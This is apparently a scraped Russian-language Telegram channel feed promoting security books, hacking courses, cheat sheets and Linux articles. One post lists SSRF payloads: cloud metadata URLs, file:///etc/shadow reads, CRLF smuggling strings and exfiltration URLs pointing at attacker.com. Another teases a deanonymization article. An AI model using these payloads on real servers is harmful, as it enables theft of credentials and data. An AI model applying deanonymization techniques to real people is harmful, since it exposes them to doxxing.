Please open Telegram to view this post
VIEW IN TELEGRAM
🔥42❤2
C# глазами хакера.zip
14.1 MB
Подробно рассмотрены все аспекты безопасности от теории до реальных реализаций .NET-приложений на языке C#
Перечислены уязвимости, которые могут быть присущи веб-сайтам и Web API, описано, как хакеры могут эксплуатировать уязвимости и как можно обеспечить безопасность приложений
Рассмотрены сетевые функции: проверка соединения, отслеживание запроса, доступ к микросервисам, работа с сокетами и др.
Приведены реальные примеры атак хакеров и способы защиты от них
Автор: Фленов М.
Год выхода: 2022
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍4😈1
Основы_криптографии_и_подстановочные_шифры_zip.003
1.4 GB
В курсе вы научитесь:
Удаляете и открываете как zip; 002 и другие оставляете в той же папке что и тот что открываете
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12👍3🦄1
List of Ransomware HD.png
643.5 KB
📄 Шпаргалка по Ransomware
Ransomware (вирус-шифровальщик, вирус-вымогатель) – это вредоносная программа, которая при попадании на компьютер атакует важнейшие системные разделы с документами, таблицами, изображениями и пр.
Затем вирус шифрует все файлы этого типа и лишает владельца доступа к ним
Злоумышленники предлагают жертве заплатить деньги за восстановление доступа к данным
✋ Secure Books
Ransomware (вирус-шифровальщик, вирус-вымогатель) – это вредоносная программа, которая при попадании на компьютер атакует важнейшие системные разделы с документами, таблицами, изображениями и пр.
Затем вирус шифрует все файлы этого типа и лишает владельца доступа к ним
Злоумышленники предлагают жертве заплатить деньги за восстановление доступа к данным
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍4❤2👾1
SSRF (Server-Side Request Forgery) – это уязвимость веб-приложения, которая позволяет злоумышленнику отправлять поддельные запросы от имени самого сервера
Пейлоады SSRF представляют собой специально сформированные запросы, которые злоумышленник внедряет в уязвимое веб-приложение
SSRF пейлоады могут включать манипуляции с URL-адресами, использование специальных схем (например, file://, ftp://), эксплойты протокольного smuggling, обращения к метаданным облачных провайдеров и другие техники для достижения своих целей
1. Сканирование внутренней сети
http://169.254.169.254/latest/meta-data/
http://metadata.google.internal/computeMetadata/v1/instance/
http://169.254.169.254/metadata/v1/
2. Получение файлов
file:///etc/passwd
file:///etc/shadow
file:///c:/boot.ini
3. Взаимодействие с внешними сервисами
http://attacker.com/?url=http://internal.site.com/
ftp://attacker.com/
4. Протокольный smuggling
http://internal.site.com:80%0d%0aHost: attacker.com%0d%0a
http://internal.site.com:80%23attacker.com
5. Эксфильтрация данных через DNS
http://attacker.com/?url=http://x.x.x.x/
http://attacker.com/?url=http://attacker.com.x.x.x.x.evilsite.com/
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7🔥5❤3
Криптографические_методы_защиты_информации.pdf
9.5 MB
В настоящем пособии рассмотрены только основные математические методы защиты информации, и среди них главный акцент сделан на криптографическую защиту, которая включает:
Кроме того, в пособии рассматриваются типовые уязвимости операционных и информационно вычислительных систем
Авторы: Владимиров С. М.
Габидулин Э. М.
Колыбельников А. И.
Кшевецкий А. С.
Год выхода: 2020
Please open Telegram to view this post
VIEW IN TELEGRAM
👍16❤2🦄2
В статье автор поделиться своим опытом и знаниями о том, как можно раскрыть личность человека в интернете, используя различные техники и программы
Деанонимизация – это процесс, при котором анонимный пользователь или группа пользователей становятся известными по своим реальным данным, таким как имя, адрес, номер телефона, электронная почта и т.д.
Существует множество инструментов и методик для деанонимизации, которые можно разделить на несколько категорий:
В статье подробно рассмотрим каждую из категорий
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11🔥5
Часть 6.zip
1.8 GB
Комплексный курс по взлому веб-сайтов и веб-приложений от Зайда Сабиха, в русской озвучке! Материал подойдёт как для специалистов, так и для начинающих, которые лишь начинают свой путь в тестировании на проникновение и хакинге.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15👍7
Список потрясающих фреймворков командной строки, наборов инструментов, руководств, шпаргалок, утилит, серверов и других полезных вещей
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7🔥3
40 книг по Linux.7z
796.7 MB
• Командная строка Linux. Полное руководство - 2017
• Ubuntu и Debian Linux для продвинутых - 2011
• Внутреннее устройство Linux - 2016
• Linux на практике - 2017
• UNIX. Профессиональное программирование - 2018
• Linux глазами хакера 2019
• Внутреннее устройство Linux 2017
• Сценарии командной оболочки. Linux, OS X и Unix 2017
• Встраиваемые системы на основе Linux 2017
• Linux API. Исчерпывающее руководство 2018
• Linux. От новичка к профессионалу 2018
• Kali Linux от разработчиков 2019
• Командная строка Linux. Полное руководство 2 изд 2020…
Please open Telegram to view this post
VIEW IN TELEGRAM
👍20🔥7💩2
В сегодняшней статье мы познакомим вас с лучшими утилитами аудита безопасности Linux
Инструмент основан на стандартах CIS и других мировых фреймворках по безопасности
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12
tcpdump HD.png
1.9 MB
📄 Шпаргалка по Tcpdump
Tcpdump – это утилита UNIX, позволяющая перехватывать и анализировать сетевой трафик, проходящий через компьютер, на котором запущена данная программа
Утилита имеет богатый набор опций и различных фильтров, благодаря чему её можно применять для различных целей
✋ Secure Book
Tcpdump – это утилита UNIX, позволяющая перехватывать и анализировать сетевой трафик, проходящий через компьютер, на котором запущена данная программа
Утилита имеет богатый набор опций и различных фильтров, благодаря чему её можно применять для различных целей
Please open Telegram to view this post
VIEW IN TELEGRAM
👍10❤2🔥2
Bash и кибербезопасность.pdf
4.9 MB
Командная строка может стать идеальным инструментом для обеспечения кибербезопасности
Невероятная гибкость и абсолютная доступность превращают стандартный интерфейс командной строки (CLI) в фундаментальное решение, если у вас есть соответствующий опыт
Авторы Пол Тронкон и Карл Олбинг рассказывают об инструментах и хитростях командной строки, помогающих собирать данные при упреждающей защите, анализировать логи и отслеживать состояние сетей
Пентестеры узнают, как проводить атаки, используя колоссальный функционал, встроенный практически в любую версию Linux
Автор: Пол Тронкон, Карл Олбинг
Год выхода: 2020
Please open Telegram to view this post
VIEW IN TELEGRAM
👍16❤4🔥2💅1
Предлагаю Вам ознакомиться со списком самых лучших, популярных и интересных сборок Linux на данный момент
В статье мы подробно рассмотрим:
1. Топ-5 лучших дистрибутивов Linux на 2024 год
2. Лучшие дистрибутивы Linux на 2024 год для новичков
3. Лучшие дистрибутивы Linux на 2024 год для системных администраторов
4. Лучшие дистрибутивы Linux на 2024 год для гейминга
5. Лучшие дистрибутивы Linux на 2024 год для разработчиков
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥20🤡11🤮6👍4😁3❤1🤔1